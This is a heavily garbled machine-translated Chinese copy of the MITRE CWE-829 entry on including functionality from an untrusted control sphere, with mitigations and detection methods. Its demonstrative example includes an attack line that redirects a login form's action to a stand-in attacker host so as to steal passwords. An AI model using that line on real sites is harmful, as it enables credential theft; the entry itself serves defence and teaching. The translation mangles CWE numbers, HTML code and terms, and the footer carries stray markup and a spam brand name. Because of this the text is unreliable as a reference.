CWE - CWE - 829:包含的功能不受信任的控制范围(4.10)

弱点ID: 829抽象:基地
结构:简单的

视图定制的信息:

描述

产品进口,需要,或包含可执行功能(如图书馆)从源目的控制范围之外的。< / div >< / div >< / div >

扩展描述

当包括第三方功能,比如web部件,图书馆,或其他来源的功能,功能的产品必须有效地信任。没有足够的保护机制,本质上可能是恶意的功能(通过来自一个不可信的来源,被欺骗,或者从可信的源在运输过程中被修改)。功能可能也包含自己的弱点,或授权访问额外的功能和状态信息应保密基础系统,如系统状态信息、敏感的应用程序数据,或者DOM的web应用程序。

这可能导致不同的后果取决于所包括的功能,但一些例子包括注入恶意软件,接触的信息给予过多的特权或权限不受信任的功能,基于dom的XSS漏洞,盗取用户的饼干,或者打开重定向到恶意软件(cwe - 601)。

的关系

此表显示了弱点和高水平类别相关的这一弱点。这些关系被定义为ChildOf、ParentOf MemberOf,并洞察类似项目可能存在的在较高和较低的抽象级别。此外,关系如PeerOf和CanAlsoBe定义显示类似的弱点,用户可能想要探索。

相关的视图”研究概念”(cwe - 1000)

自然	类型	ID	的名字
ChildOf	类——一个弱点,描述的是一个非常抽象的时尚,通常独立于任何特定的语言或技术。更具体的比一个支柱的弱点,但更普遍的基本的弱点。类级别的弱点通常描述问题的1或2以下维度:行为、财产和资源。	669年	不正确的资源领域之间的转移
ParentOf	变体——一个弱点与某种类型的产品,通常涉及到一个特定的语言或技术。更具体的比基本的弱点。变异水平弱点通常描述问题的3到5以下维度:行为、财产、技术、语言,和资源。	98年	不当控制包括/需要声明在PHP程序的文件名(PHP远程文件包含)
ParentOf	变体——一个弱点与某种类型的产品,通常涉及到一个特定的语言或技术。更具体的比基本的弱点。变异水平弱点通常描述问题的3到5以下维度:行为、财产、技术、语言,和资源。	827年	文档类型定义的控制不当
ParentOf	变体——一个弱点与某种类型的产品,通常涉及到一个特定的语言或技术。更具体的比基本的弱点。变异水平弱点通常描述问题的3到5以下维度:行为、财产、技术、语言,和资源。	830年	从一个不可信的源包含Web功能

相关观点“软件开发”(cwe - 699)

自然	类型	ID	的名字
MemberOf	类别——CWE条目包含一组其他条目,共享一个共同的特点。	1214年	数据完整性问题

简化映射的相关视图”缺点漏洞发布”(cwe - 1003)

自然	类型	ID	的名字
ChildOf	类——一个弱点,描述的是一个非常抽象的时尚,通常独立于任何特定的语言或技术。更具体的比一个支柱的弱点,但更普遍的基本的弱点。类级别的弱点通常描述问题的1或2以下维度:行为、财产和资源。	669年	不正确的资源领域之间的转移

相关视图”架构概念”(cwe - 1008)

自然	类型	ID	的名字
MemberOf	类别——CWE条目包含一组其他条目,共享一个共同的特点。	1016年	限制接触

模式的介绍

不同模式的引入提供了信息如何以及何时可以纳入这一弱点。生命周期的阶段识别点的介绍可能发生,而相关的报告提供了一个典型的场景介绍在给定的阶段。

阶段	请注意
实现	实现:造成这一弱点在建筑安全策略的实施。

常见的后果

这个表指定不同的个人相关后果的弱点。标识应用程序范围的安全领域侵犯,而影响了负面的技术影响,如果敌人成功利用这个弱点。可能提供的信息如何可能的具体结果预计将看到列表中相对于其它后果。例如,可能会有高可能性,缺点将被利用来实现一定的影响,但较低的可能性,它将被利用来实现不同的影响。

范围	影响	可能性
保密完整性可用性	技术的影响:执行未经授权的代码或命令攻击者可以将恶意功能插入导致程序下载的程序代码,攻击者放置到不可信的控制范围,如一个恶意网站。

示范例子

示例1

这个登录页面包括一个天气小部件从外部网站:

(坏的代码)

例如语言:HTML< / div >

< div class = "头" >欢迎!

< div id = " loginBox " >请登录:

<形式id = " loginForm " name = " loginForm " action = "登录。php”方法= " post " >
用户名:< input type = " text " name = "用户名" / >
< br / >
密码:< input type = "密码" name = "密码" / >
< input type = " submit " value = "登录" / >
> < /形式
< div id = " WeatherWidget " >

<脚本type = " text / javascript“src = "externalDomain.example.com/weatherwidget.js " > < /脚本>< / div >< / div >< / div >< / div >

这个网页现在只有一样安全的外部域包括功能。如果攻击者攻陷外部域和可以添加weatherwidget恶意脚本。js文件,攻击者可以完全控制,如任何XSS的弱点(cwe - 79)。

例如,用户登录信息很容易被偷weatherwidget.js添加了一行:

(攻击代码)

例如语言:JavaScript< / div >

…天气小部件代码....
. getelementbyid (“loginForm”)。action = "ATTACK.example.com/stealPassword.php”;< / div >< / div >< / div >< / div >

这行javascript更改登录表单的原始行动目标从最初的网站,网站的攻击。因此,如果用户试图登录自己的用户名和密码将会直接发送到攻击网站。

观察到的例子

参考	描述
cve - 2010 - 2076	产品不正确地拒绝dtd在SOAP消息中,它允许远程攻击者读取任意文件,发送HTTP请求到局域网服务器,或引起拒绝服务。
cve - 2004 - 0285	修改assumed-immutable配置变量包含文件允许文件包含通过直接请求。
cve - 2004 - 0030	修改assumed-immutable配置变量包含文件允许文件包含通过直接请求。
cve - 2004 - 0068	修改assumed-immutable配置变量包含文件允许文件包含通过直接请求。
cve - 2005 - 2157	修改assumed-immutable配置变量包含文件允许文件包含通过直接请求。
cve - 2005 - 2162	修改assumed-immutable配置变量包含文件允许文件包含通过直接请求。
cve - 2005 - 2198	修改assumed-immutable配置变量包含文件允许文件包含通过直接请求。
cve - 2004 - 0128	修改assumed-immutable变量配置脚本导致文件包含。
cve - 2005 - 1864	PHP文件包含。
cve - 2005 - 1869	PHP文件包含。
cve - 2005 - 1870	PHP文件包含。
cve - 2005 - 2154	PHP本地文件包含。
cve - 2002 - 1704	远程文件包含PHP。
cve - 2002 - 1707	远程文件包含PHP。
cve - 2005 - 1964	远程文件包含PHP。
cve - 2005 - 1681	远程文件包含PHP。
cve - 2005 - 2086	远程文件包含PHP。
cve - 2004 - 0127	在PHP目录遍历脆弱性包括声明。
cve - 2005 - 1971	在PHP目录遍历脆弱性包括声明。
cve - 2005 - 3335	PHP文件包含问题,远程和本地;当地包括使用“。”和“% 00”字符作为操纵,但许多远程文件包含问题可能这个向量。

潜在的缓解措施

阶段:体系结构和设计

策略:库或框架

使用审查库或框架不允许这个弱点发生或提供了结构,使这个弱点更容易避免的。

阶段:体系结构和设计

战略:执行的转换

组接受对象时,如文件名或url,是有限的或已知,从一组固定的输入值创建一个映射(比如数字id)实际的文件名或url,并拒绝所有其他输入。

例如,ID 1可以映射到“收件箱。txt”和ID 2可以映射到“profile.txt”。特性如ESAPI AccessReferenceMap [REF-45提供此功能。

阶段:体系结构和设计

对于任何一个在客户端执行安全检查,确保这些检查复制在服务器端,为了避免cwe - 602。攻击者可以绕过客户端检查通过修改值后,检查执行,或通过改变客户端完全删除客户端检查。然后,这些修改的值将被提交到服务器。

阶段:体系结构和设计;操作

策略:沙盒或监狱

运行代码的“监狱”或类似沙箱环境执行严格的流程和操作系统之间的边界。这可能有效地限制哪些文件可以在一个特定的目录或访问哪些命令可以执行的软件。

操作系统的例子包括Unix chroot监狱,AppArmor对,SELinux。在一般情况下,托管代码可能会提供一些保护。例如,java。在Java SecurityManager FilePermission允许软件指定文件操作的限制。

这可能不是一个可行的解决方案,它只限制对操作系统的影响;应用程序的其余部分可能仍然接受妥协。

应该注意避免cwe - 243和其他相关弱点监狱。

有效性:有限

注意:这种缓解的有效性取决于特定的沙盒或监狱的预防功能使用,只可能有助于减少攻击的范围,比如限制攻击者对特定文件系统的系统调用或限制部分,可以访问。

阶段:体系结构和设计;操作

策略:环境硬化

使用所需的最低特权运行您的代码来完成必要的任务(ref - 76]。如果可能的话,创建独立帐户权限有限,只用于一个任务。这样,一个成功的攻击不会立即给攻击者访问其他软件或其环境。例如,数据库应用程序很少需要作为数据库管理员运行,特别是在日常操作。

实施阶段:

策略:输入验证

假设所有的输入是恶意的。使用一个“接受良好的“输入验证策略,即。,使用一个可接受的输入列表,严格遵守规范。拒绝任何不严格符合规范的输入,或将其转换为一些。

当执行输入验证,考虑所有可能相关的属性,包括长度,类型的输入,可接受的值的全系列,缺失或额外的输入,语法,一致性相关领域,符合业务规则。作为业务规则逻辑的一个例子,在语法上“船”可能是有效的,因为它只包含字母数字字符,但它不是有效的如果输入预计仅包含颜色,如“红”或“蓝色”。

不完全依赖寻找恶意或畸形的输入。这很可能错过至少有一个不受欢迎的输入,特别是如果代码的环境变化。这可以让攻击者有足够的空间绕过验证。然而,denylists可以用于检测潜在攻击或确定哪些输入是畸形的,应该直接驳回。

验证文件名时,用严格的allowlists限制使用的字符集。如果可行,只允许一个“。”字符的文件名,以避免弱点等CWE-23,排除目录分隔符“/”等,以避免CWE-36。使用许可文件扩展名的列表,这将有助于避免cwe - 434。

不完全依赖一个过滤机制,消除潜在的危险人物。这相当于一个denylist,这可能是不完整的(cwe - 184)。例如,过滤保护“/”是不够的,如果文件系统还支持使用作为目录分隔符“\”。另一个可能的错误可能发生过滤时,仍然会产生危险的数据(cwe - 182)。例如,如果“. ./“序列是远离“……/ /字符串以顺序的方式,两个实例“. ./”将从原始字符串中删除,但其余字符仍将形成“. ./”字符串。

有效性:高

阶段:体系结构和设计;操作

策略:减少攻击表面

存储库,包括和实用程序文件之外的web文档根,如果可能的话。否则,将它们存储在一个单独的目录,并使用web服务器的访问控制功能,防止攻击者直接请求。一个常见的做法是定义一个固定的常数在每个调用程序,然后检查存在的恒定在图书馆/包含文件;如果持续的不存在,那么直接请求的文件,它可以立即退出。

这会显著减少的机会攻击者能够绕过任何保护机制的基础程序但不包括文件。这也会减少攻击表面。

阶段:体系结构和设计;实现

策略:减少攻击表面

理解所有潜在的地区不受信任的输入可以输入软件:参数或参数,饼干,任何从网络读取环境变量,反向DNS查找,查询结果,请求头,URL组件、电子邮件、文件、文件名、数据库,以及任何外部系统提供数据的应用程序。记住,这样的投入可以获得间接通过API调用。

文件包含许多问题发生,因为程序员假定某些输入不能修改,特别是对饼干和URL的组件。

阶段:操作

防火墙策略:

使用应用程序防火墙,可以检测到攻击这个弱点。它可以是有益的情况下,代码不能固定(因为它是由第三方控制),作为一项紧急预防措施,更全面的软件保证措施被应用,或者提供深度防御。

有效性:温和

注意:应用程序防火墙不可能覆盖所有可能的输入向量。此外,攻击技术可能可以绕过保护机制,比如使用畸形的输入,仍然可以由组件接收处理这些输入。根据功能的不同,应用程序防火墙可能会无意中拒绝或修改合法请求。最后,一些手动工作可能需要定制。

检测方法

自动静态分析——二进制或字节码

根据飙升,以下检测技术可能是有用的:

成本有效的部分报道:< / div >

字节码的弱点分析,包括反汇编程序+源代码弱点分析

有效性:飙升部分

人工静态分析——二进制或字节码

根据飙升,以下检测技术可能是有用的:

成本有效的部分报道:< / div >

二进制/字节码反汇编程序,然后使用手动分析缺陷和异常

有效性:飙升部分

动态分析与人工解释结果

根据飙升,以下检测技术可能是有用的:

成本有效的部分报道:< / div >

强制执行路径

监控虚拟环境——在沙箱中运行潜在的恶意代码/包装/虚拟机,看看它任何可疑的

有效性:飙升部分

人工静态分析源代码

根据飙升,以下检测技术可能是有用的:

高成本效益:< / div >

手工源代码审查(不检查)

成本有效的部分报道:< / div >

关注人工抽查,手动分析来源

有效性:高

自动静态分析源代码

根据飙升,以下检测技术可能是有用的:

成本有效的部分报道:< / div >

源代码缺陷分析仪

Context-configured源代码分析器

有效性:飙升部分

体系结构或设计审查

根据飙升,以下检测技术可能是有用的:

高成本效益:< / div >

检验(IEEE 1028标准)(适用于需求、设计、源代码,等等)。

正式的方法/ Correct-By-Construction

成本有效的部分报道:< / div >

攻击建模

有效性:高

会员资格

这MemberOf关系表显示额外CWE类别和视图引用这个弱点作为成员。这些信息通常是有用的在理解一个弱点符合外部信息源的上下文中。

自然	类型	ID	的名字
MemberOf	类别——CWE条目包含一组其他条目,共享一个共同的特点。	813年	OWASP十大2010类别A4 -不安全的直接对象引用
MemberOf	类别——CWE条目包含一组其他条目,共享一个共同的特点。	864年	2011年前25 -安全组件之间的交互
MemberOf	视图——CWE条目的一个子集,它提供了一种检查CWE的内容。两个主要视图结构片(列表)和图(包含条目之间的关系)。	884年	CWE横截面
MemberOf	类别——CWE条目包含一组其他条目,共享一个共同的特点。	1354年	OWASP 2021年十大类别A08:2021——软件和数据完整性的失败

常见的弱点枚举

cwe - 829:包含的功能不受信任的控制范围


	站点地图\|使用条款\|隐私政策\|联系我们\| 使用常见的弱点枚举(CWE)和相关的引用从这个网站的使用条款。CWE赞助的美国国土安全部(DHS)网络和基础设施安全机构(CISA)和管理的国土安全系统工程和发展研究所这是由(HSSEDI)manbetx客户端首页(斜方)。版权©2006 - 2023,斜方公司。manbetx客户端首页CWE、水煤浆、CWRAF, CWE标志是斜方公司的商标。manbetx客户端首页